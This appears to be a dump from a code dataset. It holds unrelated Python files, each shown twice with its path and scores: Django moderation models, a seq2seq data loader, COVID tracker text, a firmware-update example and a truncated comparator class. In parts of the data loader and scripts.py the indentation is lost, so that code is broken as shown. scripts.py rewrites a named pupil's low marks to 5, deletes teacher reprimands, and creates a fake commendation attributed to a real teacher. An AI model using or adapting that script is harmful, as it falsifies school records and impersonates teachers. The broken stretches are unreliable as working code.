    # Base class fix: (models.Model, FlaggedUser) lists Model before its own
    # subclass, an inconsistent MRO that raises TypeError at import;
    # FlaggedUser already derives from models.Model.
    # `User` was undefined in this module — UserProfile is the user model this
    # file imports. TODO(review): confirm the intended user model.
    user_doing_the_blocking = models.ForeignKey(UserProfile, on_delete=models.CASCADE)
    blocked_user_id = models.CharField(max_length=64)
    taking_a_break_from_this_user = models.BooleanField(default=False)
    @classmethod
    def unblock_user(cls):
        """
        check the JSON of the Blocker's block list, and see if that id exists in the
        JSON currently. If it is, then remove it.
        """
        # NOTE(review): `is` compares identity, not equality — this condition
        # almost certainly needs `==`. Also, on a @classmethod these names are
        # Field objects, not per-row values; this probably needs to be an
        # instance method operating on `self`.
        if cls.blocked_user_id is cls.user_doing_the_blocking.blockedlist.blocked_user_id:
            # TODO: Then you will remove that id from the JSON.
            for user in cls.user_doing_the_blocking.blocked_users_list:
                if user == cls.blocked_user_id:
pass | flagged.py | from django.db import models
from .models import UserProfile, Comment
class Flagged(models.Model):
    """A flag raised by a user against a comment, user or question."""
    flagged_by = models.ForeignKey(UserProfile, on_delete=models.CASCADE)
    # offensive, violent/threat, against the rules, bullying
    reason_description = models.CharField(max_length=255)
    flag_count = models.IntegerField(default=0)
    # String model references: these classes are declared further down in this
    # module, so the original bare names raised NameError at import time.
    # on_delete is required on every ForeignKey since Django 2.0, and
    # CharField requires max_length.
    flagged_to_comment = models.ForeignKey('FlaggedComment', on_delete=models.CASCADE)
    flagged_to_user = models.ForeignKey('FlaggedUser', on_delete=models.CASCADE)
    flagged_to_question = models.ForeignKey('FlaggedQuestion', on_delete=models.CASCADE)

    def add_flag(self):
        """Increment this flag's counter and persist it.

        The original was a @classmethod doing `cls.flag_count += 1`, which
        tries to add 1 to the IntegerField *descriptor* and raises TypeError;
        the counter lives on instances, so these are instance methods.
        """
        # FORMULA : Total Comments
        self.flag_count += 1
        self.save(update_fields=['flag_count'])

    def remove_flag(self):
        """Decrement this flag's counter and persist it."""
        self.flag_count -= 1
        self.save(update_fields=['flag_count'])


class FlaggedComment(models.Model):
    """Marks a single comment as flagged."""
    comment_id = models.OneToOneField(Comment, on_delete=models.CASCADE)
    flagged = models.OneToOneField(Flagged, on_delete=models.CASCADE)


class FlaggedUser(models.Model):
    """A user who has accumulated flags and may be banned."""
    is_banned_user = models.BooleanField(default=False)
    flagged_question = models.ManyToManyField('FlaggedQuestion')
    flagged_question_count = models.IntegerField(default=0)

    @classmethod
    def get_flag_count(cls):
        """Placeholder for flag-count aggregation (not implemented yet)."""
        pass


class FlaggedQuestion(models.Model):
    """A question that has been flagged (e.g. for age restriction)."""
    is_age_restricted = models.BooleanField(default=False)
class BlockedUser(FlaggedUser):
    """
    Ubiq. Language:
    Blocker = User that is blocking
    Blocked = User blocked
    Description:
    The Blocker won't see the Blocked details, and
    vice versa. This includes not seeing their
    comments, or on News Feed.
    Blocked users are viewed by Blocker on a list
    They can choose to unblock.
    """
    # Base class fix: (models.Model, FlaggedUser) lists Model before its own
    # subclass, an inconsistent MRO that raises TypeError at import;
    # FlaggedUser already derives from models.Model.
    # `User` was undefined in this module — UserProfile is the user model this
    # file imports. TODO(review): confirm the intended user model.
    user_doing_the_blocking = models.ForeignKey(UserProfile, on_delete=models.CASCADE)
    blocked_user_id = models.CharField(max_length=64)
    taking_a_break_from_this_user = models.BooleanField(default=False)
    @classmethod
    def unblock_user(cls):
        """
        check the JSON of the Blocker's block list, and see if that id exists in the
        JSON currently. If it is, then remove it.
        """
        # NOTE(review): `is` compares identity, not equality — this condition
        # almost certainly needs `==`. Also, on a @classmethod these names are
        # Field objects, not per-row values; this probably needs to be an
        # instance method operating on `self`.
        if cls.blocked_user_id is cls.user_doing_the_blocking.blockedlist.blocked_user_id:
            # TODO: Then you will remove that id from the JSON.
            for user in cls.user_doing_the_blocking.blocked_users_list:
                if user == cls.blocked_user_id:
pass | 0.418222 | 0.145085 |
import torch
from torch.autograd import Variable
import numpy as np
from collections import defaultdict
from vocab import Vocab
import os
def read_corpus(file_path, pad_bos_eos=False):
    """Read a whitespace-tokenised corpus: one sentence per line.

    :param file_path: path to the text file.
    :param pad_bos_eos: wrap each sentence in <s> ... </s> (target side only).
    :return: list of sentences, each a list of token strings.
    """
    data = []
    # `with` fixes the original's leaked file handle (open() was never closed).
    with open(file_path) as corpus_file:
        for line in corpus_file:
            sent = line.strip().split(' ')
            # only append <s> and </s> to the target sentence
            if pad_bos_eos:
                sent = ['<s>'] + sent + ['</s>']
            data.append(sent)
    return data
def read_fact(filename):
    """Read facts: per line, facts separated by ' tabplaceholder ', each fact a
    space-separated token list.

    :return: 3D list — facts[line][fact][word]. The final split field (after
        the trailing separator) is empty and is dropped.
    """
    facts = []
    # `with` fixes the original's leaked file handle (open() was never closed).
    with open(filename) as fact_file:
        for line in fact_file:
            fact = [f.strip().split(' ') for f in line.split(' tabplaceholder ')[0:-1]]  # the last fact is empty
            facts.append(fact)
    return facts  # 3D list of facts words
def word2id_2d(sents, vocab):  # batch * fact_num * fact_seq_len
    """Map a batch of fact sets from word strings to vocabulary ids."""
    return [[[vocab[word] for word in fact] for fact in fact_set]
            for fact_set in sents]
def word2id(sents, vocab):
    """Map words to vocabulary ids.

    Accepts either one sentence (list of words) or a batch (list of
    sentences) and mirrors that structure in the result.
    """
    # isinstance replaces `type(sents[0]) == list`; the `sents and` guard
    # keeps an empty input from raising IndexError on sents[0].
    if sents and isinstance(sents[0], list):
        return [[vocab[w] for w in s] for s in sents]
    return [vocab[w] for w in sents]
def pad_sentences(sents, pad_token):
    """Right-pad all sentences to the batch maximum length.

    :return: (padded_sentences, masks) where each mask holds 1 for real
        tokens and 0 for padding positions.
    """
    # default=0 keeps an empty batch from raising ValueError on max().
    max_len = max((len(s) for s in sents), default=0)
    new_sents, masks = [], []
    for s in sents:
        pad_width = max_len - len(s)
        masks.append([1] * len(s) + [0] * pad_width)
        new_sents.append(s + [pad_token] * pad_width)
    return new_sents, masks
def pad_sentences_2d(sents, pad_token):  # batch * fact_num * fact_word_num
    """Right-pad every fact to the global maximum fact length in the batch.

    :return: (padded_batch, masks) with the same batch * fact_num * max_len
        nesting; masks hold 1 for real tokens and 0 for padding.
    """
    # Flattened generator with default=0: the original nested max() raised
    # ValueError on an empty batch or an example with no facts.
    max_len = max((len(f) for facts in sents for f in facts), default=0)
    new_sents, masks = [], []
    for fact_set in sents:
        padded_set, mask_set = [], []
        for s in fact_set:
            pad_width = max_len - len(s)
            mask_set.append([1] * len(s) + [0] * pad_width)
            padded_set.append(s + [pad_token] * pad_width)
        new_sents.append(padded_set)
        masks.append(mask_set)
    return new_sents, masks
def to_input_var_2d(sents, vocab, cuda=False): # batch * fact_num * fact_word_num
    """Convert a batch of fact sets to a padded LongTensor Variable.

    NOTE(review): the padding masks are computed but discarded — confirm
    downstream code really reconstructs masks from fact_lengths.
    """
    sents_id = word2id_2d(sents, vocab)
    sents_id, masks = pad_sentences_2d(sents_id, vocab.pad_id)
    sents_var = Variable(torch.LongTensor(sents_id), requires_grad=False)
    if cuda:
        sents_var = sents_var.cuda()
    return sents_var
def to_input_var(sents, vocab, cuda=False):
    """Convert a batch of sentences to a padded LongTensor Variable.

    NOTE(review): as above, the masks from pad_sentences are discarded.
    """
    sents_id = word2id(sents, vocab)
    sents_id, masks = pad_sentences(sents_id, vocab.pad_id)
    sents_var = Variable(torch.LongTensor(sents_id), requires_grad=False)
    if cuda:
        sents_var = sents_var.cuda()
    return sents_var
class HNCMDataLoader(object):
    """Loads (source, target, facts) parallel data and the shared vocabulary."""
    def __init__(self, args, vocab=None):
        self.args = args
        self.vocab = vocab
        self.load_data()
        self.load_vocab()
    @staticmethod
    def add_args(parser):
        """Hook for registering loader-specific CLI arguments (none yet)."""
        return parser
    def load_data(self):
        """Populate self.trn/self.dev/self.tst with (src, trg, fact) triples."""
        args = self.args
        def _load(src_file, trg_file, fact_file, delimiter='\t'):
            # NOTE(review): `delimiter` is accepted (and passed below) but
            # never used inside this helper.
            if src_file is not None and trg_file is not None and fact_file is not None:
                src_sents = read_corpus(src_file, pad_bos_eos=False)
                trg_sents = read_corpus(trg_file, pad_bos_eos=True)
                fact_sents = read_fact(fact_file)
            else:
                src_sents = trg_sents = fact_sents = []
            return list(zip(src_sents, trg_sents, fact_sents)) #[src, trg, fact]
        self.trn = _load(args.train_src_file, args.train_trg_file, args.train_fact_file, args.delimiter)
        self.dev = _load(args.dev_src_file, args.dev_trg_file, args.dev_fact_file, args.delimiter)
        self.tst = _load(args.test_src_file, args.test_trg_file, args.test_fact_file, args.delimiter)
def load_vocab(self):
# Load the vocabulary or create vocabulary if not exists
if self.args.vocab is not None:
if not os.path.isfile(self.args.vocab):
print('create new vocab and save to %s' % self.args.vocab)
src_sents, trg_sents, fact_sents = zip(*self.trn)
# when building vocab, treat fact sentences as additional source sentences
# src_fact_sents contains a list of words in both source sentence and fact sentences
src_fact_sents = []
for src, fact in zip(src_sents, fact_sents):
new_fact = src
for f in fact:
new_fact += f
src_fact_sents.append(new_fact)
self.vocab = Vocab(
src_fact_sents, trg_sents, self.args.src_vocab_size,
self.args.trg_vocab_size,
remove_singleton=not self.args.include_singleton,
share_vocab=self.args.share_vocab
)
torch.save(self.vocab, self.args.vocab)
else:
self.vocab = torch.load(self.args.vocab)
else:
print('vocab file is required')
exit(0)
@staticmethod
def batch_slice(data, batch_size, sort=True):
batch_num = int(np.ceil(len(data) / float(batch_size)))
for i in range(batch_num):
cur_batch_size = batch_size if i < batch_num - 1 else len(data) - batch_size * i
src_sents = [data[i * batch_size + b][0] for b in range(cur_batch_size)]
trg_sents = [data[i * batch_size + b][1] for b in range(cur_batch_size)]
fact_sents = [data[i * batch_size + b][2] for b in range(cur_batch_size)]
if sort:
src_ids = sorted(range(cur_batch_size), key=lambda src_id: len(src_sents[src_id]), reverse=True)
src_sents = [src_sents[src_id] for src_id in src_ids]
trg_sents = [trg_sents[src_id] for src_id in src_ids]
fact_sents = [fact_sents[src_id] for src_id in src_ids]
yield src_sents, trg_sents, fact_sents
    @staticmethod
    def data_iter(data, vocab, batch_size, shuffle=True, cuda=False):
        """
        Given data, generate sample for the current batch
        randomly permute data, then sort by source length, and partition into batches
        ensure that the length of source sentences in each batch is decreasing
        """
        # Bucket examples by source length so batches are length-homogeneous.
        buckets = defaultdict(list)
        for pair in data:
            src_sent = pair[0]
            buckets[len(src_sent)].append(pair)
        batched_data = []
        for src_len in buckets:
            tuples = buckets[src_len]
            if shuffle: np.random.shuffle(tuples)
            batched_data.extend(list(HNCMDataLoader.batch_slice(tuples, batch_size)))
        if shuffle:
            np.random.shuffle(batched_data)
        for src_sents, trg_sents, fact_sents in batched_data:
            # Count of target tokens excluding the final symbol
            # (teacher-forcing shift).
            num_trg_word = sum(len(s[:-1]) for s in trg_sents)
            src_lengths = [len(s) for s in src_sents]
            src_seqs_var = to_input_var(src_sents, vocab.src, cuda)
            trg_seqs_var = to_input_var(trg_sents, vocab.trg, cuda)
            fact_lengths = [[len (s) for s in fact_sent] for fact_sent in fact_sents]
            fact_seqs_var = to_input_var_2d(fact_sents, vocab.src, cuda)
            # trg_seq drops the last token; target drops the leading <s>.
            yield {
                'src_seq': src_seqs_var, 'src_lengths': src_lengths,
                'fact_seq': fact_seqs_var, 'fact_lengths': fact_lengths,
                'trg_seq': trg_seqs_var[:, :-1],
                'target': trg_seqs_var[:, 1:],
                'num_trg_word': num_trg_word, 'num_trg_seq': len(trg_sents)
} | generation/hncm_dataloader.py | import torch
from torch.autograd import Variable
import numpy as np
from collections import defaultdict
from vocab import Vocab
import os
def read_corpus(file_path, pad_bos_eos=False):
    """Read a whitespace-tokenised corpus: one sentence per line.

    :param file_path: path to the text file.
    :param pad_bos_eos: wrap each sentence in <s> ... </s> (target side only).
    :return: list of sentences, each a list of token strings.
    """
    data = []
    # `with` fixes the original's leaked file handle (open() was never closed).
    with open(file_path) as corpus_file:
        for line in corpus_file:
            sent = line.strip().split(' ')
            # only append <s> and </s> to the target sentence
            if pad_bos_eos:
                sent = ['<s>'] + sent + ['</s>']
            data.append(sent)
    return data
def read_fact(filename):
    """Read facts: per line, facts separated by ' tabplaceholder ', each fact a
    space-separated token list.

    :return: 3D list — facts[line][fact][word]. The final split field (after
        the trailing separator) is empty and is dropped.
    """
    facts = []
    # `with` fixes the original's leaked file handle (open() was never closed).
    with open(filename) as fact_file:
        for line in fact_file:
            fact = [f.strip().split(' ') for f in line.split(' tabplaceholder ')[0:-1]]  # the last fact is empty
            facts.append(fact)
    return facts  # 3D list of facts words
def word2id_2d(sents, vocab):  # batch * fact_num * fact_seq_len
    """Map a batch of fact sets from word strings to vocabulary ids."""
    return [[[vocab[word] for word in fact] for fact in fact_set]
            for fact_set in sents]
def word2id(sents, vocab):
    """Map words to vocabulary ids.

    Accepts either one sentence (list of words) or a batch (list of
    sentences) and mirrors that structure in the result.
    """
    # isinstance replaces `type(sents[0]) == list`; the `sents and` guard
    # keeps an empty input from raising IndexError on sents[0].
    if sents and isinstance(sents[0], list):
        return [[vocab[w] for w in s] for s in sents]
    return [vocab[w] for w in sents]
def pad_sentences(sents, pad_token):
    """Right-pad all sentences to the batch maximum length.

    :return: (padded_sentences, masks) where each mask holds 1 for real
        tokens and 0 for padding positions.
    """
    # default=0 keeps an empty batch from raising ValueError on max().
    max_len = max((len(s) for s in sents), default=0)
    new_sents, masks = [], []
    for s in sents:
        pad_width = max_len - len(s)
        masks.append([1] * len(s) + [0] * pad_width)
        new_sents.append(s + [pad_token] * pad_width)
    return new_sents, masks
def pad_sentences_2d(sents, pad_token):  # batch * fact_num * fact_word_num
    """Right-pad every fact to the global maximum fact length in the batch.

    :return: (padded_batch, masks) with the same batch * fact_num * max_len
        nesting; masks hold 1 for real tokens and 0 for padding.
    """
    # Flattened generator with default=0: the original nested max() raised
    # ValueError on an empty batch or an example with no facts.
    max_len = max((len(f) for facts in sents for f in facts), default=0)
    new_sents, masks = [], []
    for fact_set in sents:
        padded_set, mask_set = [], []
        for s in fact_set:
            pad_width = max_len - len(s)
            mask_set.append([1] * len(s) + [0] * pad_width)
            padded_set.append(s + [pad_token] * pad_width)
        new_sents.append(padded_set)
        masks.append(mask_set)
    return new_sents, masks
def to_input_var_2d(sents, vocab, cuda=False): # batch * fact_num * fact_word_num
    """Convert a batch of fact sets to a padded LongTensor Variable.

    NOTE(review): the padding masks are computed but discarded — confirm
    downstream code really reconstructs masks from fact_lengths.
    """
    sents_id = word2id_2d(sents, vocab)
    sents_id, masks = pad_sentences_2d(sents_id, vocab.pad_id)
    sents_var = Variable(torch.LongTensor(sents_id), requires_grad=False)
    if cuda:
        sents_var = sents_var.cuda()
    return sents_var
def to_input_var(sents, vocab, cuda=False):
    """Convert a batch of sentences to a padded LongTensor Variable.

    NOTE(review): as above, the masks from pad_sentences are discarded.
    """
    sents_id = word2id(sents, vocab)
    sents_id, masks = pad_sentences(sents_id, vocab.pad_id)
    sents_var = Variable(torch.LongTensor(sents_id), requires_grad=False)
    if cuda:
        sents_var = sents_var.cuda()
    return sents_var
class HNCMDataLoader(object):
    """Loads (source, target, facts) parallel data and the shared vocabulary."""
    def __init__(self, args, vocab=None):
        self.args = args
        self.vocab = vocab
        self.load_data()
        self.load_vocab()
    @staticmethod
    def add_args(parser):
        """Hook for registering loader-specific CLI arguments (none yet)."""
        return parser
    def load_data(self):
        """Populate self.trn/self.dev/self.tst with (src, trg, fact) triples."""
        args = self.args
        def _load(src_file, trg_file, fact_file, delimiter='\t'):
            # NOTE(review): `delimiter` is accepted (and passed below) but
            # never used inside this helper.
            if src_file is not None and trg_file is not None and fact_file is not None:
                src_sents = read_corpus(src_file, pad_bos_eos=False)
                trg_sents = read_corpus(trg_file, pad_bos_eos=True)
                fact_sents = read_fact(fact_file)
            else:
                src_sents = trg_sents = fact_sents = []
            return list(zip(src_sents, trg_sents, fact_sents)) #[src, trg, fact]
        self.trn = _load(args.train_src_file, args.train_trg_file, args.train_fact_file, args.delimiter)
        self.dev = _load(args.dev_src_file, args.dev_trg_file, args.dev_fact_file, args.delimiter)
        self.tst = _load(args.test_src_file, args.test_trg_file, args.test_fact_file, args.delimiter)
def load_vocab(self):
# Load the vocabulary or create vocabulary if not exists
if self.args.vocab is not None:
if not os.path.isfile(self.args.vocab):
print('create new vocab and save to %s' % self.args.vocab)
src_sents, trg_sents, fact_sents = zip(*self.trn)
# when building vocab, treat fact sentences as additional source sentences
# src_fact_sents contains a list of words in both source sentence and fact sentences
src_fact_sents = []
for src, fact in zip(src_sents, fact_sents):
new_fact = src
for f in fact:
new_fact += f
src_fact_sents.append(new_fact)
self.vocab = Vocab(
src_fact_sents, trg_sents, self.args.src_vocab_size,
self.args.trg_vocab_size,
remove_singleton=not self.args.include_singleton,
share_vocab=self.args.share_vocab
)
torch.save(self.vocab, self.args.vocab)
else:
self.vocab = torch.load(self.args.vocab)
else:
print('vocab file is required')
exit(0)
@staticmethod
def batch_slice(data, batch_size, sort=True):
batch_num = int(np.ceil(len(data) / float(batch_size)))
for i in range(batch_num):
cur_batch_size = batch_size if i < batch_num - 1 else len(data) - batch_size * i
src_sents = [data[i * batch_size + b][0] for b in range(cur_batch_size)]
trg_sents = [data[i * batch_size + b][1] for b in range(cur_batch_size)]
fact_sents = [data[i * batch_size + b][2] for b in range(cur_batch_size)]
if sort:
src_ids = sorted(range(cur_batch_size), key=lambda src_id: len(src_sents[src_id]), reverse=True)
src_sents = [src_sents[src_id] for src_id in src_ids]
trg_sents = [trg_sents[src_id] for src_id in src_ids]
fact_sents = [fact_sents[src_id] for src_id in src_ids]
yield src_sents, trg_sents, fact_sents
    @staticmethod
    def data_iter(data, vocab, batch_size, shuffle=True, cuda=False):
        """
        Given data, generate sample for the current batch
        randomly permute data, then sort by source length, and partition into batches
        ensure that the length of source sentences in each batch is decreasing
        """
        # Bucket examples by source length so batches are length-homogeneous.
        buckets = defaultdict(list)
        for pair in data:
            src_sent = pair[0]
            buckets[len(src_sent)].append(pair)
        batched_data = []
        for src_len in buckets:
            tuples = buckets[src_len]
            if shuffle: np.random.shuffle(tuples)
            batched_data.extend(list(HNCMDataLoader.batch_slice(tuples, batch_size)))
        if shuffle:
            np.random.shuffle(batched_data)
        for src_sents, trg_sents, fact_sents in batched_data:
            # Count of target tokens excluding the final symbol
            # (teacher-forcing shift).
            num_trg_word = sum(len(s[:-1]) for s in trg_sents)
            src_lengths = [len(s) for s in src_sents]
            src_seqs_var = to_input_var(src_sents, vocab.src, cuda)
            trg_seqs_var = to_input_var(trg_sents, vocab.trg, cuda)
            fact_lengths = [[len (s) for s in fact_sent] for fact_sent in fact_sents]
            fact_seqs_var = to_input_var_2d(fact_sents, vocab.src, cuda)
            # trg_seq drops the last token; target drops the leading <s>.
            yield {
                'src_seq': src_seqs_var, 'src_lengths': src_lengths,
                'fact_seq': fact_seqs_var, 'fact_lengths': fact_lengths,
                'trg_seq': trg_seqs_var[:, :-1],
                'target': trg_seqs_var[:, 1:],
                'num_trg_word': num_trg_word, 'num_trg_seq': len(trg_sents)
} | 0.490968 | 0.28354 |
import random
from datacenter.models import Chastisement
from datacenter.models import Commendation
from datacenter.models import Lesson
from datacenter.models import Mark
from datacenter.models import Schoolkid
def get_schoolkid_object(child_name):
child = Schoolkid.objects.get(full_name__contains=child_name)
return child
def fix_marks(child_name):
child = get_schoolkid_object(child_name)
Mark.objects.filter(schoolkid=child, points__lt=4).update(points=5)
def remove_chastisements(child_name):
child = get_schoolkid_object(child_name)
Chastisement.objects.filter(schoolkid=child).delete()
def create_commendation(child_name, subject_name):
commendations = [
'Молодец!',
'Отлично!',
'Хорошо!',
'Гораздо лучше, чем я ожидал!',
'Ты меня приятно удивил!',
'Великолепно!',
'Прекрасно!',
'Ты меня очень обрадовал!',
'Именно этого я давно ждал от тебя!',
'Сказано здорово – просто и ясно!',
'Ты, как всегда, точен!',
'Очень хороший ответ!',
'Талантливо!',
'Ты сегодня прыгнул выше головы!',
'Я поражен!',
'Уже существенно лучше!',
'Потрясающе!',
'Замечательно!',
'Прекрасное начало!',
'Так держать!',
'Ты на верном пути!',
'Здорово!',
'Это как раз то, что нужно!',
'Я тобой горжусь!',
'С каждым разом у тебя получается всё лучше!',
'Мы с тобой не зря поработали!',
'Я вижу, как ты стараешься!',
'Ты растешь над собой!',
'Ты многое сделал, я это вижу!',
'Теперь у тебя точно все получится!',
]
child = get_schoolkid_object(child_name)
last_lesson = Lesson.objects.filter(subject__title=subject_name, subject__year_of_study=child.year_of_study).order_by('-date')[0]
Commendation.objects.create(
text=random.choice(commendations),
created=last_lesson.date,
schoolkid=child,
subject=last_lesson.subject,
teacher=last_lesson.teacher
) | scripts.py | import random
from datacenter.models import Chastisement
from datacenter.models import Commendation
from datacenter.models import Lesson
from datacenter.models import Mark
from datacenter.models import Schoolkid
def get_schoolkid_object(child_name):
child = Schoolkid.objects.get(full_name__contains=child_name)
return child
def fix_marks(child_name):
child = get_schoolkid_object(child_name)
Mark.objects.filter(schoolkid=child, points__lt=4).update(points=5)
def remove_chastisements(child_name):
child = get_schoolkid_object(child_name)
Chastisement.objects.filter(schoolkid=child).delete()
def create_commendation(child_name, subject_name):
commendations = [
'Молодец!',
'Отлично!',
'Хорошо!',
'Гораздо лучше, чем я ожидал!',
'Ты меня приятно удивил!',
'Великолепно!',
'Прекрасно!',
'Ты меня очень обрадовал!',
'Именно этого я давно ждал от тебя!',
'Сказано здорово – просто и ясно!',
'Ты, как всегда, точен!',
'Очень хороший ответ!',
'Талантливо!',
'Ты сегодня прыгнул выше головы!',
'Я поражен!',
'Уже существенно лучше!',
'Потрясающе!',
'Замечательно!',
'Прекрасное начало!',
'Так держать!',
'Ты на верном пути!',
'Здорово!',
'Это как раз то, что нужно!',
'Я тобой горжусь!',
'С каждым разом у тебя получается всё лучше!',
'Мы с тобой не зря поработали!',
'Я вижу, как ты стараешься!',
'Ты растешь над собой!',
'Ты многое сделал, я это вижу!',
'Теперь у тебя точно все получится!',
]
child = get_schoolkid_object(child_name)
last_lesson = Lesson.objects.filter(subject__title=subject_name, subject__year_of_study=child.year_of_study).order_by('-date')[0]
Commendation.objects.create(
text=random.choice(commendations),
created=last_lesson.date,
schoolkid=child,
subject=last_lesson.subject,
teacher=last_lesson.teacher
) | 0.241042 | 0.173778 |
class GrowthContent:
introduction = (
"There are many ways to measure the growth of COVID-19 cases and "
"deaths in countries around the world. For example, one could simply "
"measure an increase in the absolute number of cases or deaths in a "
"country over a period of time. Measuring growth in this manner makes "
"comparisons from one country to another difficult as larger "
"countries tend to have a larger number of new cases or deaths. To "
"better allow for comparisons across countries, two measures of "
"growth have been chosen. To calculate a percent increase in the "
"number of cases or deaths, the difference in the cumulative number "
"of cases or deaths between today and last week is divided by the "
"number of cases or deaths from last week. Alternatively, "
"the difference in the cumulative number of cases *per million* "
"between last week and today provides a way to compare countries "
"whose populations vary."
)
case_growth_data = (
"Below is a plot to visualize the growth of COVID-19 cases in either "
"the top or bottom 15 countries. The growth of cases may be "
"visualized either by percent or by an absolute increase in cases per "
"million by selecting the corresponding radio button. Either the top "
"or the bottom 15 countries may be visualized by selecting the "
"corresponding radio button."
)
death_growth_data = (
"Below is a plot to visualize the growth of COVID-19 deaths in either "
"the top or bottom 15 countries. The growth of deaths may be "
"visualized either by percent or by an absolute increase in deaths per "
"million by selecting the corresponding radio button. Either the top "
"or the bottom 15 countries may be visualized by selecting the "
"corresponding radio button."
)
growth_content = GrowthContent() | global_covid_tracker/content/growth_content.py | class GrowthContent:
introduction = (
"There are many ways to measure the growth of COVID-19 cases and "
"deaths in countries around the world. For example, one could simply "
"measure an increase in the absolute number of cases or deaths in a "
"country over a period of time. Measuring growth in this manner makes "
"comparisons from one country to another difficult as larger "
"countries tend to have a larger number of new cases or deaths. To "
"better allow for comparisons across countries, two measures of "
"growth have been chosen. To calculate a percent increase in the "
"number of cases or deaths, the difference in the cumulative number "
"of cases or deaths between today and last week is divided by the "
"number of cases or deaths from last week. Alternatively, "
"the difference in the cumulative number of cases *per million* "
"between last week and today provides a way to compare countries "
"whose populations vary."
)
case_growth_data = (
"Below is a plot to visualize the growth of COVID-19 cases in either "
"the top or bottom 15 countries. The growth of cases may be "
"visualized either by percent or by an absolute increase in cases per "
"million by selecting the corresponding radio button. Either the top "
"or the bottom 15 countries may be visualized by selecting the "
"corresponding radio button."
)
death_growth_data = (
"Below is a plot to visualize the growth of COVID-19 deaths in either "
"the top or bottom 15 countries. The growth of deaths may be "
"visualized either by percent or by an absolute increase in deaths per "
"million by selecting the corresponding radio button. Either the top "
"or the bottom 15 countries may be visualized by selecting the "
"corresponding radio button."
)
growth_content = GrowthContent() | 0.720172 | 0.969179 |
import os
import ssl
import socketpool
import wifi
import golioth.golioth as Golioth
# Get wifi details and more from a secrets.py file
try:
from secrets import secrets
except ImportError:
print("WiFi secrets are kept in secrets.py, please add them there!")
raise
def connected(client):
print("Connected to Golioth!")
client.listen_desired_version()
def disconnected(client):
print("Disconnected from Golioth!")
def on_new_version(client, pkg, version, digest):
print("new version")
print(pkg)
print(version)
print(digest)
found = False
fname = "/artifacts/" + pkg + "-" + version
try:
os.stat(fname)
found = True
except OSError as e:
found = False
if not found:
print("triggering download")
client.download_artifact(pkg, version)
def on_download_artifact(client, pkg, version, payload):
print("file arrived")
print(pkg)
print(version)
try:
if "artifacts" not in os.listdir("/"):
os.mkdir("artifacts")
fname = pkg + "-" + version
with open("/artifacts/" + fname, "w") as fp:
fp.write(payload)
fp.flush()
for f in os.listdir("/artifacts"):
if f.startswith(pkg) and f != fname:
print("removing " + f)
os.remove("/artifacts/" + f)
except OSError as e:
print("error saving artifact")
print(e)
# secrets dictionary must contain 'ssid' and 'password' at a minimum
print("Connecting...")
wifi.radio.connect(secrets["ssid"], secrets["password"])
print("IP address ", wifi.radio.ipv4_address)
pool = socketpool.SocketPool(wifi.radio)
golioth_client = Golioth.Client(
secrets["psk_id"], secrets["psk"], pool, ssl.create_default_context())
golioth_client.on_connect = connected
golioth_client.on_disconnect = disconnected
golioth_client.on_desired_version_changed = on_new_version
golioth_client.on_download_artifact = on_download_artifact
print("Connecting to Golioth...")
golioth_client.connect()
while True:
try:
golioth_client.loop()
except (ValueError, RuntimeError) as e:
print("Failed to get data, retrying\n", e)
print("Reconnecting...")
wifi.radio.connect(secrets["ssid"], secrets["password"])
golioth_client.connect()
continue | examples/native_networking/dfu/code.py | import os
import ssl
import socketpool
import wifi
import golioth.golioth as Golioth
# Get wifi details and more from a secrets.py file
try:
from secrets import secrets
except ImportError:
print("WiFi secrets are kept in secrets.py, please add them there!")
raise
def connected(client):
print("Connected to Golioth!")
client.listen_desired_version()
def disconnected(client):
print("Disconnected from Golioth!")
def on_new_version(client, pkg, version, digest):
print("new version")
print(pkg)
print(version)
print(digest)
found = False
fname = "/artifacts/" + pkg + "-" + version
try:
os.stat(fname)
found = True
except OSError as e:
found = False
if not found:
print("triggering download")
client.download_artifact(pkg, version)
def on_download_artifact(client, pkg, version, payload):
print("file arrived")
print(pkg)
print(version)
try:
if "artifacts" not in os.listdir("/"):
os.mkdir("artifacts")
fname = pkg + "-" + version
with open("/artifacts/" + fname, "w") as fp:
fp.write(payload)
fp.flush()
for f in os.listdir("/artifacts"):
if f.startswith(pkg) and f != fname:
print("removing " + f)
os.remove("/artifacts/" + f)
except OSError as e:
print("error saving artifact")
print(e)
# secrets dictionary must contain 'ssid' and 'password' at a minimum
print("Connecting...")
wifi.radio.connect(secrets["ssid"], secrets["password"])
print("IP address ", wifi.radio.ipv4_address)
pool = socketpool.SocketPool(wifi.radio)
golioth_client = Golioth.Client(
secrets["psk_id"], secrets["psk"], pool, ssl.create_default_context())
golioth_client.on_connect = connected
golioth_client.on_disconnect = disconnected
golioth_client.on_desired_version_changed = on_new_version
golioth_client.on_download_artifact = on_download_artifact
print("Connecting to Golioth...")
golioth_client.connect()
while True:
try:
golioth_client.loop()
except (ValueError, RuntimeError) as e:
print("Failed to get data, retrying\n", e)
print("Reconnecting...")
wifi.radio.connect(secrets["ssid"], secrets["password"])
golioth_client.connect()
continue | 0.114752 | 0.052765 |
# Futures
from __future__ import absolute_import
# Built-in modules
import abc
# Third party modules
import six
# Own modules
from microprobe.exceptions import MicroprobeArchitectureDefinitionError
from microprobe.utils.imp import find_subclasses
from microprobe.utils.logger import get_logger
# Constants
LOG = get_logger(__name__)
__all__ = ["import_classes_from", "Comparator"]
# Functions
def import_classes_from(modules):
"""
:param modules:
"""
LOG.info("Start")
classes = {}
for module_str in modules:
for cls in find_subclasses(module_str, Comparator):
name = cls.__name__
if name in classes:
raise MicroprobeArchitectureDefinitionError(
"Duplicated "
"definition"
" of Comparator '%s' "
"in module '%s'" % (name, module_str)
)
LOG.info("%s comparator imported", name)
classes[name] = cls
if len(classes) == 0:
LOG.warning("No comparators imported.")
LOG.info("End")
return list(classes.values())
# Classes
class Comparator(six.with_metaclass(abc.ABCMeta, object)):
"""Abstract class to perform comparisons. :class:`~.Comparator`
objects are in charge of performing comparisons between values
while providing an architecture independent and modular interface.
They are registered in an :class:`~.ISA` object using the
:meth:`~.ISA.register_value_comparator`.
Once registered, whenever a comparison is needed to perform a
given operation, it is possible to check (:meth:`check`) if
the :class:`~.Comparator` can perform the requested comparison,
and if so, it can generate (:meth:`generate`) the required
:class:`~.list` of :class:`~.Instruction` to perform it.
:param isa: Architecture to operate on.
"""
def __init__(self, arch):
"""
:param arch:
"""
self._arch = arch
@abc.abstractmethod
def check(self, reg, value):
"""Checks whether the :class:`~.Register` *reg* instance can
be compared with the *value*, which can be a ::class:`~.int` or another
:class:`~.Register`. If is not possible to perform the
comparison, a `None` value is returned. Otherwise, the
:class:`~.Register` instance where the result of the
